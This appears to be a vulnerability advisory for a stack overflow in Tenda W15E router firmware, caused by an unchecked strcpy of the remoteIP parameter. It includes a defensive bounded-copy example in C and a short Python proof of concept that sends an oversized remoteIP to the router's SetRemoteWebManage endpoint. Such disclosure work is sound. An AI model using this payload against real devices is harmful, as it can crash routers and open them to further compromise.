Overview

Affected version

W15EV1.0 V15.11.0.14

Vulnerability details

The Tenda W15EV1.0 V15.11.0.14 firmware has a stack overflow vulnerability in the formSetRemoteWebManage function. The ip variable receives the remoteIP parameter from a POST request and is passed to strcpy((char *)temp_value, (const char *)ip); with no length check, so a remoteIP value longer than temp_value overflows the buffer.

The user-provided remoteIP can trigger this security vulnerability.
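
For contrast with the unbounded strcpy above, the following added example (not from the advisory or the vendor's firmware) shows a bounded, validating copy at the same call site. The helper names, the 64-byte buffer size, and the assumption that remoteIP holds a single dotted-quad IPv4 address are all hypothetical.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>

/* Assumed size for illustration; the page does not state temp_value's size. */
#define TEMP_VALUE_SIZE 64

/* Hypothetical helper: copy src into dst only if it fits with its NUL.
 * Returns 0 on success, -1 otherwise. Oversized input is rejected, never
 * truncated, so a partial value is not silently stored. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = 0;
    if (dst == NULL || dst_size == 0 || src == NULL)
        return -1;
    while (len < dst_size && src[len] != '\0')  /* scan at most dst_size bytes */
        len++;
    if (len == dst_size)
        return -1;                              /* no room for the terminator */
    memcpy(dst, src, len + 1);
    return 0;
}

/* Hypothetical handler fragment standing in for the strcpy call site.
 * Assumes remoteIP holds a single dotted-quad IPv4 address. */
int set_remote_ip(const char *ip, char *out, size_t out_size)
{
    char temp_value[TEMP_VALUE_SIZE];
    struct in_addr addr;

    if (bounded_copy(temp_value, sizeof(temp_value), ip) != 0)
        return -1;                              /* missing or too long */
    if (inet_pton(AF_INET, temp_value, &addr) != 1)
        return -1;                              /* not a valid IPv4 address */
    return bounded_copy(out, out_size, temp_value);
}

int main(void)
{
    char stored[TEMP_VALUE_SIZE];
    char big[2001];                             /* constructed oversized input */
    memset(big, 'a', sizeof(big) - 1);
    big[sizeof(big) - 1] = '\0';
    printf("valid:     %d\n", set_remote_ip("192.0.2.10", stored, sizeof(stored)));
    printf("oversized: %d\n", set_remote_ip(big, stored, sizeof(stored)));
    return 0;
}
```
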

POC

```python
import requests

IP = "192.168.84.101"
url = f"http://{IP}/goform/SetRemoteWebManage"
payload = b'a'*2000
data = {"remoteType": 1,"remoteIP": payload}
response = requests.post(url, data=data)
print(response.text)
```
